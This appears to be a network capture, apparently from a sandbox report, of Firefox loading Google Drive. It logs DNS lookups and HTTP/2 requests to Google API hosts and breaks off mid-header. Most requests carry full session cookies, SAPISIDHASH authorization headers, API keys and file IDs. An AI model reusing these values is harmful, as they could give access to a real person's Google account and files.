OPTIONS /drive/v2beta/apps?openDrive=true&reason=700&syncType=0&errorRecovery=false&fields=items(icons%5Bcategory%3D%27application%27%5D%2Cicons(size%2CiconUrl)%2Cid%2Cname%2CopenUrlTemplate%2CprimaryFileExtensions%2CprimaryMimeTypes%2CproductId%2CrankingInfo%2CsecondaryFileExtensions%2CsecondaryMimeTypes%2Ckind)%2Ckind&appQueryScope=all_webstore&languageCode=en&retryCount=0&key=AIzaSyBc1bLOZpOtg3-qgMjSQ6pmn6HbE2zjzJg HTTP/2.0
host: clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: GET
access-control-request-headers: x-goog-drive-client-version
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
DNS

ogads-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ogads-pa.clients6.google.com

IN A

Response

ogads-pa.clients6.google.com

IN A

216.58.201.106
DNS

ogads-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ogads-pa.clients6.google.com

IN A

Response

ogads-pa.clients6.google.com

IN A

142.250.178.10
DNS

waa-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

waa-pa.clients6.google.com

IN A

Response

waa-pa.clients6.google.com

IN A

142.250.178.10
DNS

waa-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

waa-pa.clients6.google.com

IN AAAA

Response

waa-pa.clients6.google.com

IN AAAA

2a00:1450:4009:823::200a
DNS

waa-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

waa-pa.clients6.google.com

IN AAAA

Response

waa-pa.clients6.google.com

IN AAAA

2a00:1450:4009:81d::200a
DNS

clients.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

clients.l.google.com

IN AAAA

Response

clients.l.google.com

IN AAAA

2a00:1450:4009:820::200e
DNS

ogads-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ogads-pa.clients6.google.com

IN AAAA

Response

ogads-pa.clients6.google.com

IN AAAA

2a00:1450:4009:820::200a
DNS

ogads-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ogads-pa.clients6.google.com

IN AAAA

Response

ogads-pa.clients6.google.com

IN AAAA

2a00:1450:4009:80b::200a
POST

https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Create

firefox.exe

Remote address:

142.250.178.10:443

Request

POST /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
host: waa-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
x-goog-api-key: AIzaSyBGb5fGAyC-pRcRU6MUHb__b_vKha71HRE
authorization: SAPISIDHASH 1736791506_0a35ce2ca7c57187d57dc10bce993742d404ea4b SAPISID1PHASH 1736791506_0a35ce2ca7c57187d57dc10bce993742d404ea4b SAPISID3PHASH 1736791506_0a35ce2ca7c57187d57dc10bce993742d404ea4b
x-goog-authuser: 0
content-type: application/json+protobuf
x-user-agent: grpc-web-javascript/0.1
content-length: 24
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=T_04-M8kKBur6a8xfbOKZjmjNL9kTBsRu4rsNMCHs2QeEnTGsSCv--CsUMA_7Anz-hnwKJxFceW9q7mFYd14TmmcRAIhSK1Oeg6osJyBPYL1pMxtdcR4OvTEnQ7S4FVUZSmXpoI5O0b0LQspJ9OJHjc0TCkB9hkcyI9YNZQ3H2G7mfch4GnsYQvFz7Zr9drrPCv8DidNMVtOI3oX2R9pf_Dcw77_z5rHJ6vSCU_yZxpvCkN76iAOCjoeiO1DW4sMIZ71Q_b_wECFS0hLszxIr4-MtFCeYZdWG-jHBBGz2zB0G6YokmReQFCtWrc_bai1UtObFu84NlaCLo_skwU5OOaIh27ImtzuhLub6cZQgKtvcqV09hIl7WhSHJvvytzRewFKw9q4ZzayCCw8DdlzO2I0Sh84i2-7ovfi9bwhHCL7fWPuG198xV3FS29hl4Nsr-F61VKb1RRTL2GWYIv4sY32ZwKErJsagoREX6wvEq9r5SOmW1IJhGRF2yOChgizYZ_Z2ZtMgxC1swD_aed-u80wmGjuIy_IGSMSzwlxZjm082Up-Ir0-C3oC0ytfiuk1Pd1LpY7I3AZM3005BIX5eiLzuVx43Y2fsqy6NOYsdhCipia86DC-k-N04EQow14XpWm9CPIRFYLHQKYMBoMsjnyTTpZfeNHkW-UdlDnvujgiv7-_z7t8brpew
cookie: __Secure-ENID=25.SE=DZ18eMQZht2fCykakM_hyvQyRcLWcHHcBYj2eSa70b-ce43a8FUTrxK1aMd1CKnlEkohmC90YH1OyWWlnMjkbLB_YCSHbvSTP05EewRO1FR1erN0_AUQzNsVAyemQeNDgucwyVD8M4FUtUei93osbNP9z0pGYsR2To35EIxFPUIn0YA_3qlrUHLCd9HOtbWuhnw
cookie: SID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87LbvT2mFp1XSQhsDasaQ5vQACgYKAboSARQSFQHGX2MipA0LB7c7dUJjxss4u9dqrBoVAUF8yKpGZiDl2Ga6DapczbtlldaB0076
cookie: __Secure-1PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87aCaNml9AANUb757qiR4SZAACgYKAWgSARQSFQHGX2MiEKAz7esHB3ithEcaY5wZ_hoVAUF8yKq4lYskHkX1uMPsUQAUwSmT0076
cookie: __Secure-3PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87b7qnsIBhDzT85TfZY1T0FAACgYKAeISARQSFQHGX2MikazmDfD73D18BiRF0NYpwBoVAUF8yKoaxFjFpOH7_uqYoOO9p66d0076
cookie: HSID=AB3UyDpOk1JCyfzEB
cookie: SSID=A0N6rAyypBzbvJcK2
cookie: APISID=zoylvknzg7AfstSu/A1huANewAO8jtX2AS
cookie: SAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-1PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-3PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: SIDCC=AKEyXzWxG-mszgCHWeQ5I9FnokS5i0ku19Xhs4jcuAfwNy-hu-JwWrXQZV9XrVWOyyA-3-brwQ
cookie: __Secure-1PSIDCC=AKEyXzU9seN4zpWwaHPZR6WNskO_OOM6UW-hlCRKWcm1JOFllHGZCO65qro9DzTlDAR3gUWp3A
cookie: __Secure-3PSIDCC=AKEyXzXBOBb2GIm8Q0AS3aJzhr6w7-pbsHyMNiZvd--Qadyx7p7SspXiQ1C3n-RIXnZ3xoBdiw
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Create

firefox.exe

Remote address:

142.250.178.10:443

Request

OPTIONS /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
host: waa-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-api-key,x-goog-authuser,x-user-agent
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Ping

firefox.exe

Remote address:

142.250.178.10:443

Request

OPTIONS /$rpc/google.internal.waa.v1.Waa/Ping HTTP/2.0
host: waa-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-api-key,x-goog-authuser,x-user-agent
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
POST

https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

firefox.exe

Remote address:

216.58.201.106:443

Request

POST /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/2.0
host: ogads-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
x-goog-api-key: AIzaSyCbsbvGCe7C9mCtdaTycZB2eUFuzsYKG_E
authorization: SAPISIDHASH 1736791506_0a35ce2ca7c57187d57dc10bce993742d404ea4b SAPISID1PHASH 1736791506_0a35ce2ca7c57187d57dc10bce993742d404ea4b SAPISID3PHASH 1736791506_0a35ce2ca7c57187d57dc10bce993742d404ea4b
x-goog-authuser: 0
content-type: application/json+protobuf
x-user-agent: grpc-web-javascript/0.1
content-length: 70
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=T_04-M8kKBur6a8xfbOKZjmjNL9kTBsRu4rsNMCHs2QeEnTGsSCv--CsUMA_7Anz-hnwKJxFceW9q7mFYd14TmmcRAIhSK1Oeg6osJyBPYL1pMxtdcR4OvTEnQ7S4FVUZSmXpoI5O0b0LQspJ9OJHjc0TCkB9hkcyI9YNZQ3H2G7mfch4GnsYQvFz7Zr9drrPCv8DidNMVtOI3oX2R9pf_Dcw77_z5rHJ6vSCU_yZxpvCkN76iAOCjoeiO1DW4sMIZ71Q_b_wECFS0hLszxIr4-MtFCeYZdWG-jHBBGz2zB0G6YokmReQFCtWrc_bai1UtObFu84NlaCLo_skwU5OOaIh27ImtzuhLub6cZQgKtvcqV09hIl7WhSHJvvytzRewFKw9q4ZzayCCw8DdlzO2I0Sh84i2-7ovfi9bwhHCL7fWPuG198xV3FS29hl4Nsr-F61VKb1RRTL2GWYIv4sY32ZwKErJsagoREX6wvEq9r5SOmW1IJhGRF2yOChgizYZ_Z2ZtMgxC1swD_aed-u80wmGjuIy_IGSMSzwlxZjm082Up-Ir0-C3oC0ytfiuk1Pd1LpY7I3AZM3005BIX5eiLzuVx43Y2fsqy6NOYsdhCipia86DC-k-N04EQow14XpWm9CPIRFYLHQKYMBoMsjnyTTpZfeNHkW-UdlDnvujgiv7-_z7t8brpew
cookie: __Secure-ENID=25.SE=DZ18eMQZht2fCykakM_hyvQyRcLWcHHcBYj2eSa70b-ce43a8FUTrxK1aMd1CKnlEkohmC90YH1OyWWlnMjkbLB_YCSHbvSTP05EewRO1FR1erN0_AUQzNsVAyemQeNDgucwyVD8M4FUtUei93osbNP9z0pGYsR2To35EIxFPUIn0YA_3qlrUHLCd9HOtbWuhnw
cookie: SID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87LbvT2mFp1XSQhsDasaQ5vQACgYKAboSARQSFQHGX2MipA0LB7c7dUJjxss4u9dqrBoVAUF8yKpGZiDl2Ga6DapczbtlldaB0076
cookie: __Secure-1PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87aCaNml9AANUb757qiR4SZAACgYKAWgSARQSFQHGX2MiEKAz7esHB3ithEcaY5wZ_hoVAUF8yKq4lYskHkX1uMPsUQAUwSmT0076
cookie: __Secure-3PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87b7qnsIBhDzT85TfZY1T0FAACgYKAeISARQSFQHGX2MikazmDfD73D18BiRF0NYpwBoVAUF8yKoaxFjFpOH7_uqYoOO9p66d0076
cookie: HSID=AB3UyDpOk1JCyfzEB
cookie: SSID=A0N6rAyypBzbvJcK2
cookie: APISID=zoylvknzg7AfstSu/A1huANewAO8jtX2AS
cookie: SAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-1PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-3PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: SIDCC=AKEyXzWxG-mszgCHWeQ5I9FnokS5i0ku19Xhs4jcuAfwNy-hu-JwWrXQZV9XrVWOyyA-3-brwQ
cookie: __Secure-1PSIDCC=AKEyXzU9seN4zpWwaHPZR6WNskO_OOM6UW-hlCRKWcm1JOFllHGZCO65qro9DzTlDAR3gUWp3A
cookie: __Secure-3PSIDCC=AKEyXzXBOBb2GIm8Q0AS3aJzhr6w7-pbsHyMNiZvd--Qadyx7p7SspXiQ1C3n-RIXnZ3xoBdiw
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

firefox.exe

Remote address:

216.58.201.106:443

Request

OPTIONS /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/2.0
host: ogads-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-api-key,x-goog-authuser,x-user-agent
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
DNS

drivefrontend-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drivefrontend-pa.clients6.google.com

IN A

Response

drivefrontend-pa.clients6.google.com

IN A

142.250.187.202
DNS

drivefrontend-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drivefrontend-pa.clients6.google.com

IN A

Response

drivefrontend-pa.clients6.google.com

IN A

142.250.200.42
POST

https://people-pa.clients6.google.com/batch?%24ct=multipart%2Fmixed%3B%20boundary%3D%22%3D%3D%3D%3D%3Ds0xdxjmhm500%3D%3D%3D%3D%3D%22&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

142.250.187.202:443

Request

POST /batch?%24ct=multipart%2Fmixed%3B%20boundary%3D%22%3D%3D%3D%3D%3Ds0xdxjmhm500%3D%3D%3D%3D%3D%22&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: people-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain; charset=UTF-8
content-length: 835
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=T_04-M8kKBur6a8xfbOKZjmjNL9kTBsRu4rsNMCHs2QeEnTGsSCv--CsUMA_7Anz-hnwKJxFceW9q7mFYd14TmmcRAIhSK1Oeg6osJyBPYL1pMxtdcR4OvTEnQ7S4FVUZSmXpoI5O0b0LQspJ9OJHjc0TCkB9hkcyI9YNZQ3H2G7mfch4GnsYQvFz7Zr9drrPCv8DidNMVtOI3oX2R9pf_Dcw77_z5rHJ6vSCU_yZxpvCkN76iAOCjoeiO1DW4sMIZ71Q_b_wECFS0hLszxIr4-MtFCeYZdWG-jHBBGz2zB0G6YokmReQFCtWrc_bai1UtObFu84NlaCLo_skwU5OOaIh27ImtzuhLub6cZQgKtvcqV09hIl7WhSHJvvytzRewFKw9q4ZzayCCw8DdlzO2I0Sh84i2-7ovfi9bwhHCL7fWPuG198xV3FS29hl4Nsr-F61VKb1RRTL2GWYIv4sY32ZwKErJsagoREX6wvEq9r5SOmW1IJhGRF2yOChgizYZ_Z2ZtMgxC1swD_aed-u80wmGjuIy_IGSMSzwlxZjm082Up-Ir0-C3oC0ytfiuk1Pd1LpY7I3AZM3005BIX5eiLzuVx43Y2fsqy6NOYsdhCipia86DC-k-N04EQow14XpWm9CPIRFYLHQKYMBoMsjnyTTpZfeNHkW-UdlDnvujgiv7-_z7t8brpew
cookie: __Secure-ENID=25.SE=bIIYgZkZWxhYfRmTcrOp3sqFLMtvji3aZrqUKJ8_J-Se7rF06urKMhgsY_OeHZxHrszdkyWyOsrwOlPtB6uBsuqmbJNJjb-k8ICDK78IXtvLAvxcANzv2ZaK0qz93HLrtH34QTHXH5pz_2JhzrqcnV4_qWtPRm_xNPez8_ksAJ7N-T39bULuUM7sPoyr6wLsVz2Z3sHgrVg
cookie: SID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87LbvT2mFp1XSQhsDasaQ5vQACgYKAboSARQSFQHGX2MipA0LB7c7dUJjxss4u9dqrBoVAUF8yKpGZiDl2Ga6DapczbtlldaB0076
cookie: __Secure-1PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87aCaNml9AANUb757qiR4SZAACgYKAWgSARQSFQHGX2MiEKAz7esHB3ithEcaY5wZ_hoVAUF8yKq4lYskHkX1uMPsUQAUwSmT0076
cookie: __Secure-3PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87b7qnsIBhDzT85TfZY1T0FAACgYKAeISARQSFQHGX2MikazmDfD73D18BiRF0NYpwBoVAUF8yKoaxFjFpOH7_uqYoOO9p66d0076
cookie: HSID=AB3UyDpOk1JCyfzEB
cookie: SSID=A0N6rAyypBzbvJcK2
cookie: APISID=zoylvknzg7AfstSu/A1huANewAO8jtX2AS
cookie: SAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-1PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-3PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: SIDCC=AKEyXzVtXhoFjNStq47hHXmseTPxp-eooskUoh_YYm1v5fSEhejtY1ZfrOKclaiFBJIPNebD6w
cookie: __Secure-1PSIDCC=AKEyXzXBlkfPGWhS9crPfya2yNBRnFS7hQQfh9jvmeI-x0CbVciUQAOMmRcckqncsAfZlYevQg
cookie: __Secure-3PSIDCC=AKEyXzV174p6vvTKyv3VIBCmNlRatqNEqDY0PKo7YHPM2dL9oiJrLDCZQNvtnGxEUz7xd-hQgw
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
GET

https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

142.250.187.202:443

Request

GET /v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: drivefrontend-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en
accept-encoding: gzip, deflate, br
x-goog-fieldmask: responses(status(code,message,details),item(parent,modified_date_millis,has_visitor_permissions,contains_unsubscribed_children,capabilities(can_move_item_into_team_drive,can_untrash,can_modify_content_restriction,can_move_item_within_team_drive,can_move_item_out_of_team_drive,can_delete_children,can_trash_children,can_request_approval,can_read_category_metadata,can_edit_category_metadata,can_add_my_drive_parent,can_remove_my_drive_parent,can_share_child_files,can_share_child_folders,can_read,can_move_item_within_drive,can_move_children_within_drive,can_add_folder_from_another_drive,can_change_security_update_enabled,can_block_owner,can_report_spam_or_abuse,can_copy_non_authoritative,can_download_non_authoritative,can_report_not_spam,can_initiate_esignature,can_copy,can_download,can_edit,can_add_children,can_delete,can_remove_children,can_share,can_trash,can_rename,can_list_children,can_read_team_drive,can_move_team_drive_item),modified_by_me_date_millis,last_viewed_by_me_date_millis,alternate_link,workspace_id,file_size,content_restrictions(read_only),approval_version,owner(id,focus_user_id,is_me,type,email),approval_summaries,shortcut_details(target_id,target_mime_type,target_lookup_status,target_item,can_request_access_to_target),last_modifying_user(id,focus_user_id,is_me,type,email),customer_id,ancestor_has_own_permissions,has_thumbnail,thumbnail_version,title,mime_type,id,resource_key,abuse_is_appealable,abuse_notice_reason,spam_metadata(marked_as_spam_date_millis,in_spam_view,is_spam,is_inherited_spam),shared,access_requests_count,has_incoming_approval,shared_with_me_date_millis,user_role,inheritance_broken,explicitly_trashed,quota_bytes_used,subscribed,folder_color,has_child_folder,starred,file_extension,primary_sync_parent,sharing_user(id,focus_user_id,is_me,type,email),flagged_for_abuse,folder_features,spaces,source_app_id,trashed,recency_date_millis,recency_date_reason,restricted,version,action_item,viewed,team_drive_id,has_own_permissions,create_date_millis,primary_domain_name,organization_display_name,passively_subscribed,trashing_user(id,focus_user_id,is_me,type,email),trashed_date_millis))
content-type: application/json+protobuf
x-goog-ext-472780938-jspb: W1szMTEsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCwxLG51bGwsbnVsbCxbMl1dXQ==
x-goog-drive-client-version: drive.web-frontend_20250106.13_p1
authorization: SAPISIDHASH 1736791507_c3a95877e83192bede102fcc08ef1979dcffa30c_u SAPISID1PHASH 1736791507_c3a95877e83192bede102fcc08ef1979dcffa30c_u SAPISID3PHASH 1736791507_c3a95877e83192bede102fcc08ef1979dcffa30c_u
x-goog-authuser: 0
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=T_04-M8kKBur6a8xfbOKZjmjNL9kTBsRu4rsNMCHs2QeEnTGsSCv--CsUMA_7Anz-hnwKJxFceW9q7mFYd14TmmcRAIhSK1Oeg6osJyBPYL1pMxtdcR4OvTEnQ7S4FVUZSmXpoI5O0b0LQspJ9OJHjc0TCkB9hkcyI9YNZQ3H2G7mfch4GnsYQvFz7Zr9drrPCv8DidNMVtOI3oX2R9pf_Dcw77_z5rHJ6vSCU_yZxpvCkN76iAOCjoeiO1DW4sMIZ71Q_b_wECFS0hLszxIr4-MtFCeYZdWG-jHBBGz2zB0G6YokmReQFCtWrc_bai1UtObFu84NlaCLo_skwU5OOaIh27ImtzuhLub6cZQgKtvcqV09hIl7WhSHJvvytzRewFKw9q4ZzayCCw8DdlzO2I0Sh84i2-7ovfi9bwhHCL7fWPuG198xV3FS29hl4Nsr-F61VKb1RRTL2GWYIv4sY32ZwKErJsagoREX6wvEq9r5SOmW1IJhGRF2yOChgizYZ_Z2ZtMgxC1swD_aed-u80wmGjuIy_IGSMSzwlxZjm082Up-Ir0-C3oC0ytfiuk1Pd1LpY7I3AZM3005BIX5eiLzuVx43Y2fsqy6NOYsdhCipia86DC-k-N04EQow14XpWm9CPIRFYLHQKYMBoMsjnyTTpZfeNHkW-UdlDnvujgiv7-_z7t8brpew
cookie: __Secure-ENID=25.SE=bIIYgZkZWxhYfRmTcrOp3sqFLMtvji3aZrqUKJ8_J-Se7rF06urKMhgsY_OeHZxHrszdkyWyOsrwOlPtB6uBsuqmbJNJjb-k8ICDK78IXtvLAvxcANzv2ZaK0qz93HLrtH34QTHXH5pz_2JhzrqcnV4_qWtPRm_xNPez8_ksAJ7N-T39bULuUM7sPoyr6wLsVz2Z3sHgrVg
cookie: SID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87LbvT2mFp1XSQhsDasaQ5vQACgYKAboSARQSFQHGX2MipA0LB7c7dUJjxss4u9dqrBoVAUF8yKpGZiDl2Ga6DapczbtlldaB0076
cookie: __Secure-1PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87aCaNml9AANUb757qiR4SZAACgYKAWgSARQSFQHGX2MiEKAz7esHB3ithEcaY5wZ_hoVAUF8yKq4lYskHkX1uMPsUQAUwSmT0076
cookie: __Secure-3PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87b7qnsIBhDzT85TfZY1T0FAACgYKAeISARQSFQHGX2MikazmDfD73D18BiRF0NYpwBoVAUF8yKoaxFjFpOH7_uqYoOO9p66d0076
cookie: HSID=AB3UyDpOk1JCyfzEB
cookie: SSID=A0N6rAyypBzbvJcK2
cookie: APISID=zoylvknzg7AfstSu/A1huANewAO8jtX2AS
cookie: SAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-1PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-3PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: SIDCC=AKEyXzUdfF9ysvGVqQ8yMB6Fq_vDgc3HGDjpLn6IQPZrOhS6ge4rGx7n1nuO6VcOt4OJwyTTkQ
cookie: __Secure-1PSIDCC=AKEyXzVBOKym1Zj3DRTKXaC5k5piNKitJGEE-cSg2Tkuq7oBAqKoQlDVhfWDLwu5uDarY8AAVg
cookie: __Secure-3PSIDCC=AKEyXzUt3qVYxGcsvRP3wJI64jK-jKxU1kzDdjP5eHwl1lG4bPSrFpZ8z0sNKqsa2mCATRXhhQ
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
GET

https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

142.250.187.202:443

Request

GET /v1/items:get?ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: drivefrontend-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en
accept-encoding: gzip, deflate, br
x-goog-fieldmask: responses(status(code,message,details),item(parent,modified_date_millis,has_visitor_permissions,contains_unsubscribed_children,capabilities(can_move_item_into_team_drive,can_untrash,can_modify_content_restriction,can_move_item_within_team_drive,can_move_item_out_of_team_drive,can_delete_children,can_trash_children,can_request_approval,can_read_category_metadata,can_edit_category_metadata,can_add_my_drive_parent,can_remove_my_drive_parent,can_share_child_files,can_share_child_folders,can_read,can_move_item_within_drive,can_move_children_within_drive,can_add_folder_from_another_drive,can_change_security_update_enabled,can_block_owner,can_report_spam_or_abuse,can_copy_non_authoritative,can_download_non_authoritative,can_report_not_spam,can_initiate_esignature,can_copy,can_download,can_edit,can_add_children,can_delete,can_remove_children,can_share,can_trash,can_rename,can_list_children,can_read_team_drive,can_move_team_drive_item),modified_by_me_date_millis,last_viewed_by_me_date_millis,alternate_link,workspace_id,file_size,content_restrictions(read_only),approval_version,owner(id,focus_user_id,is_me,type,email),approval_summaries,shortcu